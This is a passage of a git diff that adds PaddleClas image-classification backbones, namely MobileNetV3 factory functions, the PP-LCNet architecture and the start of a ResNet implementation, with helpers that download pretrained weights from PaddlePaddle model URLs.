+ """ + model = MobileNetV3( + config=NET_CONFIG["small"], + scale=0.75, + class_squeeze=LAST_SECOND_CONV_SMALL, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_small_x0_75"], + use_ssld) + return model + + +def MobileNetV3_small_x1_0(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_small_x1_0 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x1_0` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["small"], + scale=1.0, + class_squeeze=LAST_SECOND_CONV_SMALL, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_small_x1_0"], + use_ssld) + return model + + +def MobileNetV3_small_x1_25(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_small_x1_25 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_small_x1_25` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["small"], + scale=1.25, + class_squeeze=LAST_SECOND_CONV_SMALL, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_small_x1_25"], + use_ssld) + return model + + +def MobileNetV3_large_x0_35(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_large_x0_35 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x0_35` model depends on args. 
+ """ + model = MobileNetV3( + config=NET_CONFIG["large"], + scale=0.35, + class_squeeze=LAST_SECOND_CONV_LARGE, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_large_x0_35"], + use_ssld) + return model + + +def MobileNetV3_large_x0_5(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_large_x0_5 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x0_5` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["large"], + scale=0.5, + class_squeeze=LAST_SECOND_CONV_LARGE, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_large_x0_5"], + use_ssld) + return model + + +def MobileNetV3_large_x0_75(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_large_x0_75 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x0_75` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["large"], + scale=0.75, + class_squeeze=LAST_SECOND_CONV_LARGE, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_large_x0_75"], + use_ssld) + return model + + +def MobileNetV3_large_x1_0(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_large_x1_0 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x1_0` model depends on args. 
+ """ + model = MobileNetV3( + config=NET_CONFIG["large"], + scale=1.0, + class_squeeze=LAST_SECOND_CONV_LARGE, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_large_x1_0"], + use_ssld) + return model + + +def MobileNetV3_large_x1_25(pretrained=False, use_ssld=False, **kwargs): + """ + MobileNetV3_large_x1_25 + Args: + pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise. + If str, means the path of the pretrained model. + use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True. + Returns: + model: nn.Layer. Specific `MobileNetV3_large_x1_25` model depends on args. + """ + model = MobileNetV3( + config=NET_CONFIG["large"], + scale=1.25, + class_squeeze=LAST_SECOND_CONV_LARGE, + **kwargs) + _load_pretrained(pretrained, model, MODEL_URLS["MobileNetV3_large_x1_25"], + use_ssld) + return model diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/pp_lcnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/pp_lcnet.py new file mode 100644 index 0000000..05bbccd --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/pp_lcnet.py @@ -0,0 +1,399 @@ +# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+ +from __future__ import absolute_import, division, print_function + +import paddle +import paddle.nn as nn +from paddle import ParamAttr +from paddle.nn import AdaptiveAvgPool2D, BatchNorm, Conv2D, Dropout, Linear +from paddle.regularizer import L2Decay +from paddle.nn.initializer import KaimingNormal +from ppcls.arch.backbone.base.theseus_layer import TheseusLayer +from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url + +MODEL_URLS = { + "PPLCNet_x0_25": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x0_25_pretrained.pdparams", + "PPLCNet_x0_35": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x0_35_pretrained.pdparams", + "PPLCNet_x0_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x0_5_pretrained.pdparams", + "PPLCNet_x0_75": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x0_75_pretrained.pdparams", + "PPLCNet_x1_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x1_0_pretrained.pdparams", + "PPLCNet_x1_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x1_5_pretrained.pdparams", + "PPLCNet_x2_0": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x2_0_pretrained.pdparams", + "PPLCNet_x2_5": + "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/PPLCNet_x2_5_pretrained.pdparams" +} + +__all__ = list(MODEL_URLS.keys()) + +# Each element(list) represents a depthwise block, which is composed of k, in_c, out_c, s, use_se. 
+# k: kernel_size +# in_c: input channel number in depthwise block +# out_c: output channel number in depthwise block +# s: stride in depthwise block +# use_se: whether to use SE block + +NET_CONFIG = { + "blocks2": + #k, in_c, out_c, s, use_se + [[3, 16, 32, 1, False]], + "blocks3": [[3, 32, 64, 2, False], [3, 64, 64, 1, False]], + "blocks4": [[3, 64, 128, 2, False], [3, 128, 128, 1, False]], + "blocks5": [[3, 128, 256, 2, False], [5, 256, 256, 1, False], + [5, 256, 256, 1, False], [5, 256, 256, 1, False], + [5, 256, 256, 1, False], [5, 256, 256, 1, False]], + "blocks6": [[5, 256, 512, 2, True], [5, 512, 512, 1, True]] +} + + +def make_divisible(v, divisor=8, min_value=None): + if min_value is None: + min_value = divisor + new_v = max(min_value, int(v + divisor / 2) // divisor * divisor) + if new_v < 0.9 * v: + new_v += divisor + return new_v + + +class ConvBNLayer(TheseusLayer): + def __init__(self, + num_channels, + filter_size, + num_filters, + stride, + num_groups=1): + super().__init__() + + self.conv = Conv2D( + in_channels=num_channels, + out_channels=num_filters, + kernel_size=filter_size, + stride=stride, + padding=(filter_size - 1) // 2, + groups=num_groups, + weight_attr=ParamAttr(initializer=KaimingNormal()), + bias_attr=False) + + self.bn = BatchNorm( + num_filters, + param_attr=ParamAttr(regularizer=L2Decay(0.0)), + bias_attr=ParamAttr(regularizer=L2Decay(0.0))) + self.hardswish = nn.Hardswish() + + def forward(self, x): + x = self.conv(x) + x = self.bn(x) + x = self.hardswish(x) + return x + + +class DepthwiseSeparable(TheseusLayer): + def __init__(self, + num_channels, + num_filters, + stride, + dw_size=3, + use_se=False): + super().__init__() + self.use_se = use_se + self.dw_conv = ConvBNLayer( + num_channels=num_channels, + num_filters=num_channels, + filter_size=dw_size, + stride=stride, + num_groups=num_channels) + if use_se: + self.se = SEModule(num_channels) + self.pw_conv = ConvBNLayer( + num_channels=num_channels, + filter_size=1, + 
            num_filters=num_filters,
            stride=1)

    def forward(self, x):
        # Depthwise conv -> optional SE recalibration -> pointwise (1x1) conv.
        x = self.dw_conv(x)
        if self.use_se:
            x = self.se(x)
        x = self.pw_conv(x)
        return x


class SEModule(TheseusLayer):
    """Squeeze-and-Excitation block.

    Globally average-pools the feature map, squeezes channels by
    `reduction` with a 1x1 conv, restores them with a second 1x1 conv,
    and gates the input with a hard-sigmoid channel attention map.
    """

    def __init__(self, channel, reduction=4):
        super().__init__()
        self.avg_pool = AdaptiveAvgPool2D(1)
        # Squeeze: channel // reduction bottleneck.
        self.conv1 = Conv2D(
            in_channels=channel,
            out_channels=channel // reduction,
            kernel_size=1,
            stride=1,
            padding=0)
        self.relu = nn.ReLU()
        # Excite: restore the original channel count.
        self.conv2 = Conv2D(
            in_channels=channel // reduction,
            out_channels=channel,
            kernel_size=1,
            stride=1,
            padding=0)
        self.hardsigmoid = nn.Hardsigmoid()

    def forward(self, x):
        identity = x
        x = self.avg_pool(x)
        x = self.conv1(x)
        x = self.relu(x)
        x = self.conv2(x)
        x = self.hardsigmoid(x)
        # Scale the input feature map by the learned per-channel weights.
        x = paddle.multiply(x=identity, y=x)
        return x


class PPLCNet(TheseusLayer):
    """PP-LCNet backbone built from depthwise-separable blocks.

    Args:
        scale: float=1.0. Width multiplier applied to every stage.
        class_num: int=1000. Output classes of the final FC layer.
        dropout_prob: float=0.2. Dropout probability before the classifier.
        class_expand: int=1280. Channel count of the last 1x1 conv.
    """

    def __init__(self,
                 scale=1.0,
                 class_num=1000,
                 dropout_prob=0.2,
                 class_expand=1280):
        super().__init__()
        self.scale = scale
        self.class_expand = class_expand

        # Stem: 3x3 stride-2 conv.
        self.conv1 = ConvBNLayer(
            num_channels=3,
            filter_size=3,
            num_filters=make_divisible(16 * scale),
            stride=2)

        # Stages 2-6: stacks of DepthwiseSeparable blocks driven by
        # NET_CONFIG entries of the form (kernel, in_c, out_c, stride, use_se).
        self.blocks2 = nn.Sequential(*[
            DepthwiseSeparable(
                num_channels=make_divisible(in_c * scale),
                num_filters=make_divisible(out_c * scale),
                dw_size=k,
                stride=s,
                use_se=se)
            for i, (k, in_c, out_c, s, se) in enumerate(NET_CONFIG["blocks2"])
        ])

        self.blocks3 = nn.Sequential(*[
            DepthwiseSeparable(
                num_channels=make_divisible(in_c * scale),
                num_filters=make_divisible(out_c * scale),
                dw_size=k,
                stride=s,
                use_se=se)
            for i, (k, in_c, out_c, s, se) in enumerate(NET_CONFIG["blocks3"])
        ])

        self.blocks4 = nn.Sequential(*[
            DepthwiseSeparable(
                num_channels=make_divisible(in_c * scale),
                num_filters=make_divisible(out_c * scale),
                dw_size=k,
                stride=s,
                use_se=se)
            for i, (k, in_c, out_c, s, se) in enumerate(NET_CONFIG["blocks4"])
        ])

        self.blocks5 = nn.Sequential(*[
            DepthwiseSeparable(
                num_channels=make_divisible(in_c * scale),
                num_filters=make_divisible(out_c * scale),
                dw_size=k,
                stride=s,
                use_se=se)
            for i, (k, in_c, out_c, s, se) in enumerate(NET_CONFIG["blocks5"])
        ])

        self.blocks6 = nn.Sequential(*[
            DepthwiseSeparable(
                num_channels=make_divisible(in_c * scale),
                num_filters=make_divisible(out_c * scale),
                dw_size=k,
                stride=s,
                use_se=se)
            for i, (k, in_c, out_c, s, se) in enumerate(NET_CONFIG["blocks6"])
        ])

        self.avg_pool = AdaptiveAvgPool2D(1)

        # Expand pooled features to `class_expand` channels before the FC head.
        self.last_conv = Conv2D(
            in_channels=make_divisible(NET_CONFIG["blocks6"][-1][2] * scale),
            out_channels=self.class_expand,
            kernel_size=1,
            stride=1,
            padding=0,
            bias_attr=False)

        self.hardswish = nn.Hardswish()
        self.dropout = Dropout(p=dropout_prob, mode="downscale_in_infer")
        self.flatten = nn.Flatten(start_axis=1, stop_axis=-1)

        self.fc = Linear(self.class_expand, class_num)

    def forward(self, x):
        x = self.conv1(x)

        x = self.blocks2(x)
        x = self.blocks3(x)
        x = self.blocks4(x)
        x = self.blocks5(x)
        x = self.blocks6(x)

        x = self.avg_pool(x)
        x = self.last_conv(x)
        x = self.hardswish(x)
        x = self.dropout(x)
        x = self.flatten(x)
        x = self.fc(x)
        return x


def _load_pretrained(pretrained, model, model_url, use_ssld):
    # pretrained semantics: False -> leave weights as-is; True -> download
    # from `model_url`; str -> load from a local checkpoint path.
    if pretrained is False:
        pass
    elif pretrained is True:
        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
    elif isinstance(pretrained, str):
        load_dygraph_pretrain(model, pretrained)
    else:
        raise RuntimeError(
            "pretrained type is not available. Please use `string` or `boolean` type."
        )


def PPLCNet_x0_25(pretrained=False, use_ssld=False, **kwargs):
    """
    PPLCNet_x0_25
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `PPLCNet_x0_25` model depends on args.
    """
    model = PPLCNet(scale=0.25, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x0_25"], use_ssld)
    return model


def PPLCNet_x0_35(pretrained=False, use_ssld=False, **kwargs):
    """
    PPLCNet_x0_35
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `PPLCNet_x0_35` model depends on args.
    """
    model = PPLCNet(scale=0.35, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x0_35"], use_ssld)
    return model


def PPLCNet_x0_5(pretrained=False, use_ssld=False, **kwargs):
    """
    PPLCNet_x0_5
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `PPLCNet_x0_5` model depends on args.
    """
    model = PPLCNet(scale=0.5, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x0_5"], use_ssld)
    return model


def PPLCNet_x0_75(pretrained=False, use_ssld=False, **kwargs):
    """
    PPLCNet_x0_75
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `PPLCNet_x0_75` model depends on args.
    """
    model = PPLCNet(scale=0.75, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x0_75"], use_ssld)
    return model


def PPLCNet_x1_0(pretrained=False, use_ssld=False, **kwargs):
    """
    PPLCNet_x1_0
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `PPLCNet_x1_0` model depends on args.
    """
    model = PPLCNet(scale=1.0, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x1_0"], use_ssld)
    return model


def PPLCNet_x1_5(pretrained=False, use_ssld=False, **kwargs):
    """
    PPLCNet_x1_5
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `PPLCNet_x1_5` model depends on args.
    """
    model = PPLCNet(scale=1.5, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x1_5"], use_ssld)
    return model


def PPLCNet_x2_0(pretrained=False, use_ssld=False, **kwargs):
    """
    PPLCNet_x2_0
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `PPLCNet_x2_0` model depends on args.
    """
    model = PPLCNet(scale=2.0, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x2_0"], use_ssld)
    return model


def PPLCNet_x2_5(pretrained=False, use_ssld=False, **kwargs):
    """
    PPLCNet_x2_5
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `PPLCNet_x2_5` model depends on args.
    """
    model = PPLCNet(scale=2.5, **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["PPLCNet_x2_5"], use_ssld)
    return model
diff --git a/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/resnet.py b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/resnet.py
new file mode 100644
index 0000000..4f79c0d
--- /dev/null
+++ b/Smart_container/PaddleClas/ppcls/arch/backbone/legendary_models/resnet.py
@@ -0,0 +1,534 @@
# copyright (c) 2021 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ResNet / ResNet-vd backbones (legendary_models/resnet.py).

from __future__ import absolute_import, division, print_function

import numpy as np
import paddle
from paddle import ParamAttr
import paddle.nn as nn
from paddle.nn import Conv2D, BatchNorm, Linear
from paddle.nn import AdaptiveAvgPool2D, MaxPool2D, AvgPool2D
from paddle.nn.initializer import Uniform
import math

from ppcls.arch.backbone.base.theseus_layer import TheseusLayer
from ppcls.utils.save_load import load_dygraph_pretrain, load_dygraph_pretrain_from_url

# Download URLs for the officially released pretrained weights.
MODEL_URLS = {
    "ResNet18":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet18_pretrained.pdparams",
    "ResNet18_vd":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet18_vd_pretrained.pdparams",
    "ResNet34":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet34_pretrained.pdparams",
    "ResNet34_vd":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet34_vd_pretrained.pdparams",
    "ResNet50":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet50_pretrained.pdparams",
    "ResNet50_vd":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet50_vd_pretrained.pdparams",
    "ResNet101":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet101_pretrained.pdparams",
    "ResNet101_vd":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet101_vd_pretrained.pdparams",
    "ResNet152":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet152_pretrained.pdparams",
    "ResNet152_vd":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet152_vd_pretrained.pdparams",
    "ResNet200_vd":
    "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/legendary_models/ResNet200_vd_pretrained.pdparams",
}

# NOTE(review): this exports a dict_keys view, not a list; sibling module
# alexnet.py uses list(MODEL_URLS.keys()) — confirm whether the view is
# intentional before changing.
__all__ = MODEL_URLS.keys()
'''
ResNet config: dict.
    key: depth of ResNet.
    values: config's dict of specific model.
        keys:
            block_type: Two different blocks in ResNet, BasicBlock and BottleneckBlock are optional.
            block_depth: The number of blocks in different stages in ResNet.
            num_channels: The number of channels to enter the next stage.
'''
NET_CONFIG = {
    "18": {
        "block_type": "BasicBlock",
        "block_depth": [2, 2, 2, 2],
        "num_channels": [64, 64, 128, 256]
    },
    "34": {
        "block_type": "BasicBlock",
        "block_depth": [3, 4, 6, 3],
        "num_channels": [64, 64, 128, 256]
    },
    "50": {
        "block_type": "BottleneckBlock",
        "block_depth": [3, 4, 6, 3],
        "num_channels": [64, 256, 512, 1024]
    },
    "101": {
        "block_type": "BottleneckBlock",
        "block_depth": [3, 4, 23, 3],
        "num_channels": [64, 256, 512, 1024]
    },
    "152": {
        "block_type": "BottleneckBlock",
        "block_depth": [3, 8, 36, 3],
        "num_channels": [64, 256, 512, 1024]
    },
    "200": {
        "block_type": "BottleneckBlock",
        "block_depth": [3, 12, 48, 3],
        "num_channels": [64, 256, 512, 1024]
    },
}


class ConvBNLayer(TheseusLayer):
    """Conv2D + BatchNorm (+ optional ReLU), with optional vd-style
    2x2 average-pool downsampling applied before the conv."""

    def __init__(self,
                 num_channels,
                 num_filters,
                 filter_size,
                 stride=1,
                 groups=1,
                 is_vd_mode=False,
                 act=None,
                 lr_mult=1.0,
                 data_format="NCHW"):
        super().__init__()
        self.is_vd_mode = is_vd_mode
        self.act = act
        # vd trick: downsample with avg-pool instead of a strided 1x1 conv.
        self.avg_pool = AvgPool2D(
            kernel_size=2, stride=2, padding=0, ceil_mode=True)
        self.conv = Conv2D(
            in_channels=num_channels,
            out_channels=num_filters,
            kernel_size=filter_size,
            stride=stride,
            padding=(filter_size - 1) // 2,
            groups=groups,
            weight_attr=ParamAttr(learning_rate=lr_mult),
            bias_attr=False,
            data_format=data_format)
        self.bn = BatchNorm(
            num_filters,
            param_attr=ParamAttr(learning_rate=lr_mult),
            bias_attr=ParamAttr(learning_rate=lr_mult),
            data_layout=data_format)
        self.relu = nn.ReLU()

    def forward(self, x):
        if self.is_vd_mode:
            x = self.avg_pool(x)
        x = self.conv(x)
        x = self.bn(x)
        # Only "relu" is supported here; any truthy `act` selects ReLU.
        if self.act:
            x = self.relu(x)
        return x


class BottleneckBlock(TheseusLayer):
    """1x1 -> 3x3 -> 1x1 residual bottleneck (output = num_filters * 4)."""

    def __init__(self,
                 num_channels,
                 num_filters,
                 stride,
                 shortcut=True,
                 if_first=False,
                 lr_mult=1.0,
                 data_format="NCHW"):
        super().__init__()

        self.conv0 = ConvBNLayer(
            num_channels=num_channels,
            num_filters=num_filters,
            filter_size=1,
            act="relu",
            lr_mult=lr_mult,
            data_format=data_format)
        self.conv1 = ConvBNLayer(
            num_channels=num_filters,
            num_filters=num_filters,
            filter_size=3,
            stride=stride,
            act="relu",
            lr_mult=lr_mult,
            data_format=data_format)
        self.conv2 = ConvBNLayer(
            num_channels=num_filters,
            num_filters=num_filters * 4,
            filter_size=1,
            act=None,
            lr_mult=lr_mult,
            data_format=data_format)

        # Projection shortcut when the channel count / spatial size changes;
        # the first stage keeps a strided conv, later ones use vd avg-pool.
        if not shortcut:
            self.short = ConvBNLayer(
                num_channels=num_channels,
                num_filters=num_filters * 4,
                filter_size=1,
                stride=stride if if_first else 1,
                is_vd_mode=False if if_first else True,
                lr_mult=lr_mult,
                data_format=data_format)
        self.relu = nn.ReLU()
        self.shortcut = shortcut

    def forward(self, x):
        identity = x
        x = self.conv0(x)
        x = self.conv1(x)
        x = self.conv2(x)

        if self.shortcut:
            short = identity
        else:
            short = self.short(identity)
        x = paddle.add(x=x, y=short)
        x = self.relu(x)
        return x


class BasicBlock(TheseusLayer):
    """Two 3x3 convs with a residual connection (ResNet-18/34 block)."""

    def __init__(self,
                 num_channels,
                 num_filters,
                 stride,
                 shortcut=True,
                 if_first=False,
                 lr_mult=1.0,
                 data_format="NCHW"):
        super().__init__()

        self.stride = stride
        self.conv0 = ConvBNLayer(
            num_channels=num_channels,
            num_filters=num_filters,
            filter_size=3,
            stride=stride,
            act="relu",
            lr_mult=lr_mult,
            data_format=data_format)
        self.conv1 = ConvBNLayer(
            num_channels=num_filters,
            num_filters=num_filters,
            filter_size=3,
            act=None,
            lr_mult=lr_mult,
            data_format=data_format)
        if not shortcut:
            self.short = ConvBNLayer(
                num_channels=num_channels,
                num_filters=num_filters,
                filter_size=1,
                stride=stride if if_first else 1,
                is_vd_mode=False if if_first else True,
                lr_mult=lr_mult,
                data_format=data_format)
        self.shortcut = shortcut
        self.relu = nn.ReLU()

    def forward(self, x):
        identity = x
        x = self.conv0(x)
        x = self.conv1(x)
        if self.shortcut:
            short = identity
        else:
            short = self.short(identity)
        x = paddle.add(x=x, y=short)
        x = self.relu(x)
        return x


class ResNet(TheseusLayer):
    """
    ResNet
    Args:
        config: dict. config of ResNet.
        version: str="vb". Different version of ResNet, version vd can perform better.
        class_num: int=1000. The number of classes.
        lr_mult_list: list. Control the learning rate of different stages.
    Returns:
        model: nn.Layer. Specific ResNet model depends on args.
    """

    def __init__(self,
                 config,
                 version="vb",
                 class_num=1000,
                 lr_mult_list=[1.0, 1.0, 1.0, 1.0, 1.0],
                 data_format="NCHW",
                 input_image_channel=3,
                 return_patterns=None):
        super().__init__()

        self.cfg = config
        self.lr_mult_list = lr_mult_list
        self.is_vd_mode = version == "vd"
        self.class_num = class_num
        self.num_filters = [64, 128, 256, 512]
        self.block_depth = self.cfg["block_depth"]
        self.block_type = self.cfg["block_type"]
        self.num_channels = self.cfg["num_channels"]
        # BasicBlock configs end at 256 channels; BottleneckBlock outputs 4x.
        self.channels_mult = 1 if self.num_channels[-1] == 256 else 4

        assert isinstance(self.lr_mult_list, (
            list, tuple
        )), "lr_mult_list should be in (list, tuple) but got {}".format(
            type(self.lr_mult_list))
        # One multiplier for the stem plus one per residual stage.
        assert len(self.lr_mult_list
                   ) == 5, "lr_mult_list length should be 5 but got {}".format(
                       len(self.lr_mult_list))

        self.stem_cfg = {
            #num_channels, num_filters, filter_size, stride
            "vb": [[input_image_channel, 64, 7, 2]],
            "vd":
            [[input_image_channel, 32, 3, 2], [32, 32, 3, 1], [32, 64, 3, 1]]
        }

        self.stem = nn.Sequential(* [
            ConvBNLayer(
                num_channels=in_c,
                num_filters=out_c,
                filter_size=k,
                stride=s,
                act="relu",
                lr_mult=self.lr_mult_list[0],
                data_format=data_format)
            for in_c, out_c, k, s in self.stem_cfg[version]
        ])

        self.max_pool = MaxPool2D(
            kernel_size=3, stride=2, padding=1, data_format=data_format)
        block_list = []
        for block_idx in range(len(self.block_depth)):
            shortcut = False
            for i in range(self.block_depth[block_idx]):
                # `block_type` names BasicBlock or BottleneckBlock defined in
                # this module; resolved dynamically via globals().
                block_list.append(globals()[self.block_type](
                    num_channels=self.num_channels[block_idx] if i == 0 else
                    self.num_filters[block_idx] * self.channels_mult,
                    num_filters=self.num_filters[block_idx],
                    stride=2 if i == 0 and block_idx != 0 else 1,
                    shortcut=shortcut,
                    if_first=block_idx == i == 0 if version == "vd" else True,
                    lr_mult=self.lr_mult_list[block_idx + 1],
                    data_format=data_format))
                shortcut = True
        self.blocks = nn.Sequential(*block_list)

        self.avg_pool = AdaptiveAvgPool2D(1, data_format=data_format)
        self.flatten = nn.Flatten()
        # Final feature width: 512 for BasicBlock nets, 2048 for Bottleneck.
        self.avg_pool_channels = self.num_channels[-1] * 2
        stdv = 1.0 / math.sqrt(self.avg_pool_channels * 1.0)
        self.fc = Linear(
            self.avg_pool_channels,
            self.class_num,
            weight_attr=ParamAttr(initializer=Uniform(-stdv, stdv)))

        self.data_format = data_format
        if return_patterns is not None:
            self.update_res(return_patterns)
            self.register_forward_post_hook(self._return_dict_hook)

    def forward(self, x):
        with paddle.static.amp.fp16_guard():
            if self.data_format == "NHWC":
                x = paddle.transpose(x, [0, 2, 3, 1])
                x.stop_gradient = True
            x = self.stem(x)
            x = self.max_pool(x)
            x = self.blocks(x)
            x = self.avg_pool(x)
            x = self.flatten(x)
            x = self.fc(x)
        return x


def _load_pretrained(pretrained, model, model_url, use_ssld):
    # pretrained semantics: False -> leave weights as-is; True -> download
    # from `model_url`; str -> load from a local checkpoint path.
    if pretrained is False:
        pass
    elif pretrained is True:
        load_dygraph_pretrain_from_url(model, model_url, use_ssld=use_ssld)
    elif isinstance(pretrained, str):
        load_dygraph_pretrain(model, pretrained)
    else:
        raise RuntimeError(
            "pretrained type is not available. Please use `string` or `boolean` type."
        )


def ResNet18(pretrained=False, use_ssld=False, **kwargs):
    """
    ResNet18
    Args:
        pretrained: bool=False or str. If `True` load pretrained parameters, `False` otherwise.
                    If str, means the path of the pretrained model.
        use_ssld: bool=False. Whether using distillation pretrained model when pretrained=True.
    Returns:
        model: nn.Layer. Specific `ResNet18` model depends on args.
    """
    model = ResNet(config=NET_CONFIG["18"], version="vb", **kwargs)
    _load_pretrained(pretrained, model, MODEL_URLS["ResNet18"], use_ssld)
    return model


def ResNet18_vd(pretrained=False, use_ssld=False, **kwargs):
    """
    ResNet18_vd
    Args:
